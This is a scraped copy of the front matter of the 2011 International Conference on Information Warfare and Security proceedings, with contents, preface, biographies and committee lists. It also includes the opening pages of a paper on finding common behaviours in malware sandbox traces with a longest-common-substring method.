27.06.2013 Views

6th European Conference - Academic Conferences

6th European Conference - Academic Conferences

6th European Conference - Academic Conferences

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

The Proceedings<br />

of the<br />

<strong>6th</strong> International<br />

<strong>Conference</strong> on Information<br />

Warfare and Security<br />

The George Washington University,<br />

Washington, DC, USA<br />

17-18 March 2011<br />

Edited by<br />

Leigh Armistead<br />

Edith Cowan University<br />

Programme Chair


Copyright The Authors, 2011. All Rights Reserved.<br />

No reproduction, copy or transmission may be made without written permission from the individual authors.<br />

Papers have been double-blind peer reviewed before final submission to the conference. Initially, paper<br />

abstracts were read and selected by the conference panel for submission as possible papers for the<br />

conference.<br />

Many thanks to the reviewers who helped ensure the quality of the full papers.<br />

These <strong>Conference</strong> Proceedings have been submitted to Thomson ISI for indexing.<br />

Further copies of this book and previous year’s proceedings can be purchased from http://academicconferences.org/2-proceedings.htm<br />

ISBN:97-1-906638-92-4 Book<br />

Published by <strong>Academic</strong> Publishing International Limited<br />

Reading<br />

UK<br />

44-118-972-4148<br />

www.academic-publishing.org


Contents<br />

Paper Title Author(s) Page<br />

No.<br />

Preface iii<br />

Biographies of <strong>Conference</strong> Chairs,<br />

Programme Chair, Keynote Speaker and<br />

Mini-track Chairs<br />

Biographies of contributing authors v<br />

Using the Longest Common Substring on<br />

Dynamic Traces of Malware to Automatically<br />

Identify Common Behaviors<br />

Modeling and Justification of the Store and<br />

Forward Protocol: Covert Channel Analysis<br />

The Evolution of Information Assurance (IA)<br />

and Information Operations (IO) Contracts<br />

across the DoD: Growth Opportunities for<br />

<strong>Academic</strong> Research – an Update<br />

The Uses and Limits of Game Theory in<br />

Conceptualizing Cyberwarfare<br />

Jaime Acosta 1<br />

Hind Al Falasi and Liren Zhang 8<br />

Edwin Leigh Armistead and Thomas Murphy 14<br />

Merritt Baer 23<br />

Who Needs a Botnet if you Have Google? Ivan Burke and Renier van Heerden 32<br />

Mission Resilience in Cloud Computing: A<br />

Biologically Inspired Approach<br />

Link Analysis and Link Visualization of<br />

Malicious Websites<br />

The Strategies for Critical Cyber<br />

Infrastructure (CCI) Protection by Enhancing<br />

Software Assurance<br />

Building an Improved Taxonomy for IA<br />

Education Resources in PRISM<br />

Using Dynamic Addressing for a Moving<br />

Target Defense<br />

Changing the Face of Cyber Warfare with<br />

International Cyber Defense Collaboration<br />

Cyber Strategy and the Law of Armed<br />

Conflict<br />

eGovernance and Strategic Information<br />

Warfare – non Military Approach<br />

Intelligence-Driven Computer Network<br />

Defense Informed by Analysis of Adversary<br />

Campaigns and Intrusion Kill Chains<br />

The Hidden Grand Narrative of Western<br />

Military Policy: A Linguistic Analysis of<br />

American Strategic Communication<br />

Host-Based Data Exfiltration Detection via<br />

System Call Sequences<br />

Detection of YASS Using Calibration by<br />

Motion Estimation<br />

Marco Carvalho, Dipankar Dasgupta, Michael<br />

Grimaila and Carlos Perez<br />

Manoj Cherukuri and Srinivas Mukkamala 52<br />

Mecealus Cronkrite, John Szydlik and Joon Park 68<br />

Vincent Garramone, Daniel Likarish 76<br />

Stephen Groat, Matthew Dunlop, Randy Marchany<br />

and Joseph Tront<br />

Marthie Grobler, Joey Jansen van Vuuren and<br />

Jannie Zaaiman,<br />

Ulf Haeussler 99<br />

Karim Hamza and Van Dalen 106<br />

Eric Hutchins, Michael Cloppert and Rohan Amin 113<br />

Saara Jantunen and Aki-Mauri Huhtinen 126<br />

Brian Jewell and Justin Beaver 134<br />

Kesav Kancherla and Srinivas Mukkamala 143<br />

i<br />

iv<br />

42<br />

84<br />

92


Paper Title Author(s) Page<br />

No.<br />

Developing a Knowledge System for<br />

Information Operations<br />

CAESMA – An On-Going Proposal of a<br />

Network Forensic Model for VoIP traffic<br />

Secure Proactive Recovery – a Hardware<br />

Based Mission Assurance Scheme<br />

Identifying Cyber Espionage: Towards a<br />

Synthesis Approach<br />

Security Analysis of Webservers of<br />

Prominent Organizations in Pakistan<br />

International Legal Issues and Approaches<br />

Regarding Information Warfare<br />

International Legal Issues and Approaches<br />

Regarding Information Warfare<br />

Louise Leenen, Ronell Alberts, Katarina Britz,<br />

Aurona Gerber and Thomas Meyer<br />

Jose Mas y Rubi, Christian Del Carpio, Javier<br />

Espinoza, and Oscar Nuñez Mori<br />

Ruchika Mehresh, Shambhu Upadhyaya and Kevin<br />

Kwiat<br />

151<br />

160<br />

171<br />

David Merritt and Barry Mullins 180<br />

Muhammad Naveed 188<br />

Alexandru Nitu 200<br />

Cyberwarfare and Anonymity Christopher Perr 207<br />

Catch Me If You Can: Cyber Anonymity David Rohret and Michael Kraft 213<br />

Neutrality in the Context of Cyberwar Julie Ryan and Daniel Ryan 221<br />

Labelling: Security in Information<br />

Management and Sharing<br />

Information Management Security for Inter-<br />

Organisational Business Processes,<br />

Services and Collaboration<br />

Anatomy of Banking Trojans – Zeus<br />

Crimeware (how Similar are its Variants)<br />

Terrorist use of the Internet: Exploitation and<br />

Support Through ICT Infrastructure<br />

Evolving an Information Security Curriculum:<br />

New Content, Innovative Pedagogy and<br />

Flexible Delivery Formats<br />

Harm Schotanus, Tim Hartog, Hiddo Hut and Daniel<br />

Boonstra<br />

Maria Th. Semmelrock-Picej, Alfred Possegger and<br />

Andreas Stopper<br />

228<br />

238<br />

Madhu Shankarapani and Srinivas Mukkamala 252<br />

Namosha Veerasamy and Marthie Grobler 260<br />

Tanya Zlateva, Virginia Greiman, Lou Chitkushev<br />

and Kip Becker<br />

Research in Progress Papers 277<br />

Towards Persistent Control over Shared<br />

Information in a Collaborative Environment<br />

3D Execution Monitor (3D-EM): Using 3D<br />

Circuits to Detect Hardware Malicious<br />

Inclusions in General Purpose Processors<br />

Towards An Intelligent Software Agent<br />

System As Defense Against Botnets<br />

268<br />

Shada Alsalamah, Alex Gray and Jeremy Hilton 279<br />

Michael Bilzor 289<br />

Evan Dembskey and Elmarie Biermann 299<br />

Theoretical Offensive Cyber Militia Models Rain Ottis 308<br />

Work in Progress 315<br />

Large-scale analysis of continuous data in<br />

cyber-warfare threat detection<br />

A System and Method for Designing Secure<br />

Client-Server Communication Protocols<br />

Based on Certificateless PKI<br />

William Acosta 317<br />

Natarajan Vijayarangan 320<br />

ii


Preface<br />

These Proceedings are the work of researchers contributing to the <strong>6th</strong> International <strong>Conference</strong> on<br />

Information Warfare and Security (ICIW 2011), hosted this year by the George Washington University,<br />

Washington DC, USA. The <strong>Conference</strong> Chair is Dr. Julie Ryan from the George Washington University,<br />

Washington, DC, USA and I am again the Programme Chair.<br />

The opening keynote address this year is given by Matthew A. Stern, General Dynamics Advanced<br />

Information Systems, USA The second day will be opened by Mathew “Pete” Peterson from the Naval<br />

Criminal Investigative Service, USA.<br />

An important benefit of attending this conference is the ability to share ideas and meet the people who hold<br />

them. The range of papers will ensure an interesting and enlightened discussion over the two day schedule.<br />

The topics covered by the papers this year illustrate the depth of the information operations’ research area,<br />

with the subject matter ranging from the highly technical to the more strategic visions of the use and<br />

influence of information.<br />

With an initial submission of 97 abstracts, after the double blind, peer review process there are 38 papers<br />

published in these <strong>Conference</strong> Proceedings, including contributions from Austria, Bangladesh, Estonia,<br />

Finland, India, Iran, Pakistan, Peru, Romania, South Africa, the Netherlands, United Arab Emirates, United<br />

Kingdom and the United States.<br />

I wish you a most enjoyable conference.<br />

March 2011<br />

Leigh Armistead<br />

Edith Cowan University<br />

Programme Chair<br />

iii


Biographies of <strong>Conference</strong> Chairs, Programme Chairs and Keynote<br />

Speakers<br />

<strong>Conference</strong> Chairs<br />

Programme Chairs<br />

Dr. Julie Ryan currently teaches and directs research in Information Assurance at<br />

The George Washington University. Prior to joining academia, she worked in various<br />

positions in industry and government. Her degrees are from the US Air Force<br />

Academy, Eastern Michigan University, and The George Washington University.<br />

Dr Edwin “Leigh” Armistead is the Director of Business Development for Goldbelt<br />

Hawk LLC, the Programme Chair for the International <strong>Conference</strong> of Information<br />

Warfare and an Adjunct Lecturer for Edith Cowen University in Perth, Australia. He<br />

has written nine books, 18 journal articles, presented 17 academic papers and served<br />

as a Chairman for 16 professional and academic conferences. Formerly a Master<br />

Faculty at the Joint Forces Staff College, Leigh received his PhD from Edith Cowan<br />

University with an emphasis on Information Operations. He also serves as a Co-<br />

Editor for the Journal of International Warfare, and the Editorial Review Board for<br />

<strong>European</strong> <strong>Conference</strong> on Information Warfare.<br />

Keynote Speakers<br />

Mathew “Pete” Peterson has served in a variety of positions within US government<br />

agencies since 1989, to include 13 years on active duty in the U.S. Army. He has<br />

experience in a wide range of domains, including information assurance/information<br />

protection, research, development & acquisition (RDA)/research & technology<br />

protection (RTP), cyber analysis issues, critical infrastructure protection, and threat<br />

analysis. He currently serves as Cyber Analysis Division Chief within the Naval<br />

Criminal Investigative Service, while working towards completion of his dissertation in<br />

the Executive Leadership Doctoral Program at George Washington University’s Virginia<br />

Campus.<br />

Matthew Stern is the director of cyber accounts for General Dynamics Advanced Information Systems. He<br />

also provides subject matter expertise in cyber space operations to the company and its customers. Stern<br />

also represents the company on several boards and advisory groups providing thought leadership to the<br />

cyber security community. He spent 22 years in positions of increasing responsibility in the U.S. Army<br />

culminating with command of 2nd Battalion, 1st Information Operations Command and the Army Computer<br />

Emergency Response Team (ACERT). This is the first unit in U.S. Army history dedicated to cyberspace<br />

operations. Stern is an established expert on information technology, network security, information<br />

operations and special information operations. He is also a recognized visionary regarding the military<br />

conduct of cyberspace operations. He has developed his knowledge and expertise through practical<br />

experience leading his command, the U.S. military data communication services in Iraq, support to the<br />

technical architecture of the U.S. Army’s digitized Armored Corps, and the systems integration for the Land<br />

Information Warfare Activity Information Dominance Center. Stern is also a decorated combat veteran of<br />

Operations DESERT SHIELD /STORM and IRAQI FREEDOM. Matt holds a Masters degree in Information<br />

Systems and Computer Resource Management from Webster University and a Bachelor’s of Science degree<br />

in Political Science from Northern Illinois University.<br />

iv


Biographies of contributing authors (in alphabetical order)<br />

Jaime Acosta completed his Ph.D. in Computer Science at the University of Texas at El Paso. Dr. Acosta’s<br />

research has received awards and recognition including the outstanding dissertation award by the University<br />

of Texas at El Paso. Jaime is currently working at the United States Army Research Laboratory conducting<br />

security research.<br />

William Acosta, Ph.D. received his Ph.D. from the University of Notre Dame in 2008 and is currently an<br />

assistant professor at the University of Toledo teaching in the Computer Science and Engineering<br />

Technology Program. His prior work included peer-to-peer search and distributed systems. He is currently<br />

working on experimental data systems research focusing on large-scale data analysis.<br />

Hind Al Falasi, is currently pursuing a PhD in Information Security at the United Arab Emirates University, Al<br />

Ain, UAE. He received a Bachelors of Science in Information Security from the United Arab Emirates<br />

University. Where the main focus is Security of Vehicular Ad hoc Networks.<br />

Rohan Amin is a member of Lockheed Martin's CIRT, who helped grow the team from 5 charter members<br />

with limited responsibilities to an industry-leading entity with global scope. His contributions to the team have<br />

ranged from deeply technical to broadly organizational.<br />

Shada Al-Salamah is a doctoral candidate at the Department of Computer Science & Informatics, Cardiff<br />

University, UK. She received her MSc in Strategic Information Systems with Information Assurance from<br />

Cardiff University and received a BSc in Information Technology from the College of Computer and<br />

Information Sciences, King Saud University, Riyadh, Saudi Arabia.<br />

Merritt Baer is a graduate of Harvard Law School and Harvard College. She has conducted clinical cyberlaw<br />

research at Harvard's Berkman Center for Internet and Society and has published a number of pieces at the<br />

intersection of cybercrime, Constitutional Internet issues and national security. She currently serves as a<br />

judicial clerk at the United States Court of Appeals for the Armed Forces.<br />

Michael Bilzor is a PhD student at the Naval Postgraduate School. He has a B.S. in Computer Science from<br />

the U.S. Naval Academy and an M.S. in Computer Science from Johns Hopkins University. He served in F-<br />

14 and F/A-18 squadrons as a Naval Flight Officer until 2005. His research interest is in hardware security.<br />

Ivan Burke is a Msc student in the department of Computer Science at the University of Pretoria, South<br />

Africa. He also works full time at the Council of Scientific and Industrial Research South Africa in the<br />

department of Defense Peace Safety and Security,where he works within the Command, Control and<br />

Information Warfare research group.<br />

Marco Carvalho is a research Scientist at Florida Institute for Human and Machine Cognition (IHMC). He<br />

received his Ph.D. from Tulane University, New Orleans, following a M.Sc. in Computer Science from<br />

University of West Florida, a M.Sc. in Mechanical Engineering from Federal University of Brasilia (UnB), and<br />

a B.Sc. in Mechanical Engineering, also from UnB. His research interests are primarily in the areas of<br />

biologically inspired security and tactical networks.<br />

Mecealus Cronkrite is studying for a M.S in Information & Security Management at Syracuse University,<br />

School of Information Studies, He is a DHS Career Development Grant fellow, Graduate Engineering<br />

Minority (GEM) fellow. He gained a B.S degree in 2009 in Computer Science, from the State University at<br />

Brockport NY. He has spent 7 years in industry in systems integration programing and analysis, and IT<br />

disaster management roles.<br />

Mike Cloppert is a member of Lockheed Martin's CIRT, who helped grow the team from 5 charter members<br />

with limited responsibilities to an industry-leading entity with global scope. His contributions to the team have<br />

ranged from deeply technical to broadly organizational.<br />

Evan Dembskey is a senior lecturer at UNISA in Pretoria, South Africa. He currently lectures in the area of<br />

computer security. His research interests include IW and technology and science in Ancient Greece and<br />

Rome.<br />

Javier Espinoza was born in Lima, Peru, on August, 1971. He studied Electronic Engineering in Pontificia<br />

Universidad Catolica del Peru. He studied specialization in Cisco Certified Network Associate (CCNA), in<br />

v


Structured Wiring and Information System Security. Javier is studying a Telecommunications Engineering<br />

master at Pontificia Universidad Catolica del Peru in Lima, Peru<br />

Stephen Groat is a PhD student at Virginia Tech in the Bradley Department of Electrical and Computer<br />

Engineering focusing on network security and IPv6. Working in coordination with the Information Technology<br />

Security Office and Lab, Stephen is researching the security implications of IPv6.<br />

Ulf Haeussler is a Legal Advisor in the German Armed Forces and currently seconded to HQ SACT. Prior<br />

to this assignment, Ulf served in multiple German Armed Forces positions as well as at NATO HQ, and was<br />

deployed to NATO operations as a reservist on active duty. Ulf is widely published on international law.<br />

Karim Hamza works as an <strong>Academic</strong> Researcher at the Maastricht school of Management (Netherlands),<br />

Part Time Professor at the American University (Egypt) and Approved Tutor for Edinburgh Business School<br />

(UK). Additionally, he works as a Business Development Manager in one of the leading information<br />

technology companies specialized in Enterprise Resource Planning applications for governments and private<br />

sectors.<br />

Tim Hartog graduated in 2005 at the Technical University of Twente, in the Netherlands. Since then he has<br />

been active in the field of Information Security. During his work at TNO, the Dutch Organization for Applied<br />

Scientific Research, Tim has been working in the areas of Trusted Computing, Trusted Operating Systems<br />

and Cross Domain Solutions.<br />

Saara Jantunen studies leadership as a doctoral student in the Finnish Defence University. She has studied<br />

English language and culture at the University of Groningen in the Netherlands and English philology in the<br />

University of Helsinki, Finland. Her research interests include language & identity and military discourse.<br />

Jantunen currently works in education.<br />

Brian Jewell is a graduate student with an emphasis on Information Security at Tennessee Technological<br />

University. He received his B.S. in Computer Science from Murray State University. During summer 2010 he<br />

interned at Oak Ridge National Laboratory in the Applied Software Engineering Research group. His<br />

research is in the area of host intrusion detection and response.<br />

Louise Leenen is a Senior Researcher at the South African Council for Scientific and Industrial Research in<br />

the Defence, Peace, Safety and Security (DPSS) unit which focuses on defence related research and<br />

development. She holds a PhD in Computer Science from the University of Wollongong in Australia.<br />

Dan Likarish is a Director of the Center on Information Assurance Studies and faculty at Regis University<br />

School of Information and Computer Science. For many years he has been the advisor for undergraduate<br />

and graduate students with an interest in IS and IT problems. His research interests are in rapid curriculum<br />

development and deployment in conjunction with virtual worlds.<br />

Jose Luis Mas y Rubi studied Systems Engineering at the Instituto Universitario Politecnico Santiago<br />

Mariño in Barcelona, Venezuela. He has a Cisco CCNA certification in networking. He is currently studying<br />

for a Telecommunications Engineering Master degree at Pontificia Universidad Catolica del Peru in Lima,<br />

Peru.<br />

Ruchika Mehresh is a doctoral student of Computer Science and Engineering at the State University of New<br />

York at Buffalo. Her research focuses on reliability and security in fault-tolerant computing. She has worked<br />

on research projects funded by U.S. Air Force Research Laboratory<br />

David Merritt received his B.S. in computer engineering from the U.S. Air Force Academy. He is an<br />

Undergraduate Network Warfare Training graduate, holds CISSP and GSEC certifications, and spent 3 years<br />

on the Air Force Computer Emergency Response Team. David is an active duty officer attending the Air<br />

Force Institute of Technology in Ohio.<br />

Srinivas Mukkamala is a senior research scientist with ICASA (Institute for Complex Additive Systems<br />

Analysis), Adjunct Faculty of Computer Science Department of New Mexico Tech, advisor Cyber Security<br />

Works, and co-founder/managing partner of CAaNES LLC. He received his Ph.D. from New Mexico Tech in<br />

2005. He is a frequent speaker on information assurance in conferences and tutorials across the world.<br />

Muhammad Naveed completed B.Sc degree in Electrical Engineering (with majors in communication),<br />

University of Engineering and Technology (UET), Peshawar, Pakistan 2010. Currently a lecturer at<br />

vi


Department of Computer Science, IQRA University, Peshawar, Pakistan. Research interests include<br />

information security and cryptography.<br />

Alexandru Nitu is a legal counselor at the Romanian Intelligence Service, with nine years of experience in<br />

matters regarding human rights protection. He is involved in legal studies referring to the impact of the<br />

intelligence activities on respecting citizens’ fundamental rights and liberties.<br />

Rain Ottis is a scientist at the Cooperative Cyber Defence Centre of Excellence. He is a graduate of the<br />

United States Military Academy and Tallinn University of Technology (MSc, Informatics). He continues his<br />

studies at a PhD program in Tallinn University of Technology, where he focuses on politically motivated<br />

cyber attack campaigns by non-state actors.<br />

Christopher Perr is currently a PhD candidate at Auburn University studying computer and network security.<br />

He holds a B.S. in Computer Science from the Air Force Academy and a Masters of Software Engineering<br />

from Auburn University.<br />

David Rohret, CSC, Inc. Joint Information Operations Warfare Center (JIOWC). For over fifteen years he<br />

has pursued network security interests to include developing and vetting exploits for use on established red<br />

teams and adversarial research. He holds degrees in Computer Science from the University of Iowa and La<br />

Salle University.<br />

Shambhu Upadhyaya is Professor of Computer Science and Engineering at the State University of New<br />

York at Buffalo. His research interests are computer security, information assurance, fault-tolerant<br />

computing, distributed systems and reliability. His research has been funded by federal agencies such as<br />

National Science Foundation, U.S. Air Force Research Laboratory, DARPA, National Security Agency and<br />

industries such as IBM, Intel, Cisco and Harris Corporation.<br />

Namosha Veerasamy obtained a BSc:IT Computer Science Degree, and both a BSc: Computer Science<br />

(Honours Degree) and MSc: Computer Science with distinction from the University of Pretoria. She is<br />

currently employed as a researcher at the Council for Scientific and Industrial Research (CSIR) in Pretoria.<br />

Namosha is also qualified as a Certified Information System Security Professional (CISSP).<br />

Natarajan Vijayarangan is a senior scientist in TCS. He obtained his Ph.D in Mathematics in 2001 from<br />

RIASM, University of Madras. He received 'Best Research Paper Award' of Ramanujan Mathematical<br />

Society in 2000. He has published patents, papers and books in the field of Information Security. He has<br />

participated in NIST SHA-3 competition and received 'AIP Anchor Award'.<br />

Jannie Zaaiman (B Comm, B Proc, HBA, MBA, PhD) is Deputy Vice Chancellor: Operations at the<br />

University of Venda, and is the former Executive Dean, Faculty of Information and Communication<br />

Technology at the Tshwane University of Technology (TUT). Before joining TUT, Jannie was Group<br />

Company Secretary of Sasol, Managing Executive: Outsourcing and Divestitures at Telkom and Group<br />

Manager at Development Bank of Southern Africa.<br />

Tanya Zlateva completed her doctorate at the Dresden University of Technology, Germany, and<br />

postdoctoral training at the Harvard-MIT Division for Health Sciences and Technology. Her research interests<br />

include application level security, biometrics, and new educational technologies. She currently serves as<br />

director of Boston University's Center for Reliable Information Systems and Cyber Security.<br />

vii


<strong>Conference</strong> Executive:<br />

Michael Grimaila, Center for Cyberspace Research, WPAFB, Ohio, USA<br />

Dorothy Denning, Naval Postgraduate School, Monterey, CA, USA<br />

Doug Webster, MITRE Corporation - United States Strategic Command's Global Innovation & Strategy<br />

Center<br />

Kevin Streff, Dakota State University, USA<br />

Andy Jones, Security Research Centre, British Telecom, UK and Khalifa University, UAE<br />

William Mahoney University of Nebraska Omaha, Omaha, USA<br />

Dan Kuehl, National Defense University, Washington DC, UK,<br />

Corey Schou, Idaho State University, USA<br />

Committee Members:<br />

The conference programme committee consists of key people in the information systems, information<br />

warfare and information security communities around the world. The following people have confirmed their<br />

participation:<br />

Jim Alves-Voss (University of Idaho, USA); Todd Andel (Air Force Insitute of Technology, USA); Leigh<br />

Armistead (Edith Cowan University, Australia); Johnnes Arreymbi (University of East London, UK); Rusty<br />

Baldwin (Air Force Insitute of Technology, USA); Richard Baskerville (Georgia State University, USA); Allan<br />

Berg (Critical Infrastructure and Cyber Protection Center, Capitol College, USA); Sviatoslav Braynov<br />

(University of Illinois, USA); Blaine Burnham (University of Nebraska, Omaha, USA); Catharina Candolin<br />

(Finnish Defence Forces, Helsinki, Finland); Rodney Clare (EDS and the Open University, UK); Nathan<br />

Clarke (University of Plymouth, UK); Geoffrey Darnton, (University of Bournemouth, UK); Dipankar Dasgupta<br />

(Intelligent Security Systems, USA); Dorothy Denning (Navel Postgraduate School, USA); Glenn Dietrich<br />

(University of Texas, USA); David Fahrenkrug (US Air Force, USA); Kevin Gleason (KMG Consulting, MA,<br />

USA); Sanjay Goel (University at Albany, USA); Michael Grimaila (Air force Institute of Technology, Ohio,<br />

USA); Daniel Grosu (Wayne State University, USA); Drew Hamilton (Auburn University, USA); Dwight<br />

Haworth (University of Nebraska at Omaha, USA); Philip Hippensteel (Penn State University, USA); Jeffrey<br />

Humphries (Air Force Institute of Technology, USA); Bill Hutchinson (Edith Cowan University, Australia);<br />

Berg P Hyacinthe (Assas School of Law, Universite Paris, France); Andy Jones (British Telecom, UK);<br />

James Joshi (University of Pittsburgh, USA); Leonard Kabeya Mukeba (Kigali Institute of Science and<br />

Technology, Rwanda); Prashant Krishnamurthy (University of Pittsburgh, USA); Dan Kuehl (National<br />

Defense Forces, USA); Stuart Kurkowski (Airforce Institute of Technology, USA); Takakazu Kurokawa<br />

(National Defense Acadamy, Japan); Rauno Kuusisto (National Defence College, Finland); Tuija Kuusisto<br />

(Internal Security ICT Agency, Finland); Arun Lakhotia (University of Louisiana Lafayette, USA); Sam Liles<br />

(Purdue University Calumet, USA): Cherie Long (Clayton State University, Decatur, USA); Brian Lopez<br />

(Lawrence Livermore National Laboratory); Juan Lopez (Air Force Institute of Technology, USA); Bin Lu<br />

(West Chester University, USA); Bill Mahoney (University of Nebraska, USA); John McCarthy<br />

(Buckinghamshire and Chiltern University College, UK); J Todd McDonald (Airforce Institute of Technology,<br />

USA); Robert Mills (Air Force Institute of Technology, Ohio, USA); Don Milne (Buckinghamshire and Chiltern<br />

University College, UK); Srinivas Mukkamala (New Mexico Tech, Socorro, USA); Barry Mullins (Air Force<br />

Institute of Technology, USA); Andrea Perego (Università degli Studi dell’Insubria, Italy); Gilbert Patterson<br />

(Air Force Institute of Technology, USA): Richard Raines (Airforce Institute of Technology, USA); Ken Revett<br />

(University of Westminster, UK); Neil Rowe (US Naval Postgraduate School, USA); Julie Ryan (George<br />

Washington University, USA); Corey Schou (Idaho State University, USA); Dan Shoemaker (Univesity of<br />

Detroit Mercy, USA); William Sousan (University of Nebraska, Omaha, USA); Kevin Streff (Dakota State<br />

University, USA); Dennis Strouble (Air Force Institute of Technology, USA); Eric Trias (Air Force Institute of<br />

Technology, USA); Doug Twitchell (Illinois State University, USA); Renier van Heerden (CSIR, Pretoria,<br />

South Africa); Stylianos Vidalis (Newport Business School, UK); Fahad Waseem (Unviersity of Northumbria,<br />

UK); Kenneth Webb, Edith Cowan University, Australia); Douglas Webster (USSTRATCOM Global<br />

Innovation & Strategy Center, USA); Zehai Zhou (Dakota State University, USA).<br />

viii


Using the Longest Common Substring on Dynamic Traces<br />

of Malware to Automatically Identify Common Behaviors<br />

Jaime Acosta<br />

Army Research Laboratory, White Sands, NM, USA<br />

jaime.acosta1@us.army.mil<br />

Abstract: A large amount of research is focused on identifying malware. Once identified, the behavior of the<br />

malware must be analyzed to determine its effects on a system. This can be done by tracing through a malware<br />

binary using a disassembler or logging its dynamic behavior using a sandbox (virtual machines that execute a<br />

binary and log all dynamic events such as network, registry, and file manipulations). However, even with these<br />

tools, analyzing malware behavior is very time consuming for an analyst. In order to alleviate this, recent work<br />

has identified methods to categorize malware into “clusters” or types based on common dynamic behavior. This<br />

allows a human analyst to look at only a fraction of malware instances–those most dissimilar. Still missing are<br />

techniques that identify similar behaviors among malware of different types. Also missing is a way to<br />

automatically identify differences among same-type malware instances to determine whether the differences are<br />

benign or are the key malicious behavior. The research presented here shows that a wide collection of malware<br />

instances have common dynamic behavior regardless of their type. This is a first step toward enabling an analyst<br />

to more efficiently identify malware instances’ effects on systems by reducing the need for redundant analysis<br />

and allowing filtration of common benign behavior. This research uses the publicly available Reference Data Set<br />

that was collected over a period of three years. Malware instances were identified and assigned a type by six<br />

anti-malware scanners. The dataset consists of dynamic trace events of 3131 malware instances generated by<br />

CWSandbox. For this research, the dataset is separated into two sets: small and large. The small set contains<br />

2071 instances of malware that are less than 100 KB in size. The large set contains 1060 instances of malware<br />

that are between 100 KB and 3.4 MB in size. In order to measure the common behavior between the small and<br />

large sets, common sequential event sequences within each malware instance in the small set are identified<br />

using a modified version of the longest common substring algorithm. Once identified, all appearances of these<br />

common event sequences are removed from the large set to determine shared behavior. Most common<br />

sequences are between length 2 and 60 events. Results indicate that when using length 2 event sequences and<br />

higher, on average, the large set instances share 96% of event sequences, with length 6 and higher event<br />

sequences–66%, and with length 12 and higher event sequences–50%. This indicates that an analyst’s workload<br />

can be largely reduced by removing common behavior sequences. Furthermore, it shows that malware instances<br />

may not always fall into exclusive categories. It may be more beneficial to instead identify behaviors and map<br />

them to malware instances, for example, as with the Malware Attribute Enumeration and Characterization<br />

(MAEC). Future efforts may look into attaching semantic labels on long sequences that are common to many<br />

malware instances in order to aid the analyst further.<br />

Keywords: malware, similarity, dynamic, analysis, substring<br />

1. Introduction<br />

As the number of malware instances grows each year, there is a need for automated methods that<br />

can efficiently identify, classify, and reduce the amount of data that an analyst has to review pertaining<br />

to malware. This paper focuses on identifying similarities among known malware instances in order to<br />

reduce an analyst’s workload.<br />

Automatic malware detection has been researched extensively in the past (Vinod et al., 2009). When<br />

malware is identified, it is assigned a type or name. The malware binary behavior is analyzed in detail<br />

in order to provide alerts, recover data, and assess damage among others. Recently, there have been<br />

two main approaches to accomplish this: static and dynamic analysis. In static analysis, the malware<br />

binary is reverse engineered using a disassembler. This method can be very time consuming,<br />

especially due to obfuscation techniques such as polymorphism (Kasina et al., 2010), metamorphism<br />

(Lee et al., 2010), memory packing (Han et al., 2010), and virtualization (Sharif et al., 2009). Dynamic<br />

analysis, on the other hand involves running the malware binary in a controlled environment known as<br />

a sandbox, e.g., Norman (Norman Solutions, 2003), Anubis (Bayer et al., 2006), CWSandbox<br />

(Willems et al., 2007), where every event during the malware’s execution is logged to an event trace.<br />

State-of-the-art sandboxes have the ability to fast-forward time to elicit delayed malware execution<br />

and can even simulate user interaction. Current techniques, e.g., (Rieck et al., 2010), use clustering<br />

methods in order to group similar malware based on their events during runtime, but still require<br />

manual analysis to identify specific similarities and differences.<br />

1


Jaime Acosta<br />

The research presented here uses a dataset that consists of sandbox event traces of 3131 malware<br />

instances. Manual observation of the dataset revealed many behavior patterns that were shared<br />

across many instances such as file replacements (which involve a series of system calls), that at first<br />

glance seem complex and overwhelming, but were made simple by replacing these common<br />

behaviors with short annotations. This paper is a step in automating this process.<br />

The following are the contributions resulting from the work described in this paper.<br />

This research provides a methodology shows how the longest common substring algorithm can<br />

be modified to conduct similarity analysis on malware using dynamic event traces. This similarity<br />

may be due to code reuse, which arises from legitimate third-party libraries and also by reusing<br />

infected or malicious code.<br />

Use of this algorithm shows that in this dataset of malware, even though the instances are of<br />

different types (assigned by anti-virus programs), there are a large number of common behaviors.<br />

This means that it is the case that malware authors reuse code, and that an analyst could use this<br />

to eliminate duplicate processing.<br />

This research shows that the common behaviors identified are not limited to short trivial event<br />

sequences; there are many large sequences. This indicates that it may be possible to replace<br />

semantically rich events with natural language annotations to facilitate analysis.<br />

2. Related work<br />

Because of the large growth of malware instances being introduced each year, there has been a large<br />

amount of work to aid in each stage of the malware analysis workflow.<br />

The first step in analysis is data collection. Tools that aid in this collection include Nepenthes<br />

(Baecher et al., 2006), Amun (Göbel, 2009), and HoneyPots (Provos, 2004). After collection, the<br />

malware instances are analyzed using static (source code) or dynamic (event traces) techniques. In<br />

the past decade there have been a wide variety of techniques used for static and dynamic analysis of<br />

legitimate source code, with the goal of exploiting program semantics in an efficient way (Cornelissen,<br />

2009). Related to malware, there have been many techniques that exploit characteristics unique to<br />

malware, including malicious behavior, small program size, and code reuse among instances.<br />

In both static and dynamic analysis techniques, one method that has had recent attention is using<br />

machine learning to cluster similar malware instances. Clustering methods are useful because they<br />

generalize large sets of malware into categories with limited need for manual human intervention.<br />

Jang and Brumley (2009) perform static analysis by identifying areas of code reuse by clustering<br />

malware binaries. His clustering method uses bloom filters, which identify similarity of malware<br />

instances by applying hashing techniques to fixed size chunks of the malware executable code.<br />

On the other hand, Bayer et al. (2009) use machine learning algorithms to identify similarities in<br />

malware instances by comparing their dynamic event traces, which include system calls, their<br />

dependencies, and network behavior. Next, the malware instances are clustered based on their<br />

dynamic behavior. A limitation of this approach is that the algorithm is trained with a fixed set of<br />

malware. It does not allow retraining with additional malware samples during the clustering phase.<br />

Rieck extends this with his Malheur (Rieck et al., 2010) system by establishing an iterative<br />

mechanism that consists of clustering and then classifying new instances into existing clusters. In his<br />

work, similarity is determined by the presence of shared fixed-length instruction sequences. In<br />

addition, Rieck also uses a dynamic trace representation format called MIST (Trinius et al., 2010) that<br />

allows prioritization of event parameters (e.g., an openfile system call may have the file name, file<br />

type, and the file path as parameters). This is meant to allow more efficient processing for machine<br />

learning algorithms by reducing the input file size by leaving out less-critical parameters. MIST also<br />

provides a common file format to which many of the available sandbox output can be converted.<br />

After the instances are clustered, an analyst may have to conduct deeper investigation, such as exact<br />

differences and similarities in the binaries. It may be the case that malware in different clusters share<br />

common behaviors. This results in redundant analysis by a human analyst. Another issue is that<br />

instances in a cluster are not exactly the same. There may be malicious behavior that is unique to one<br />

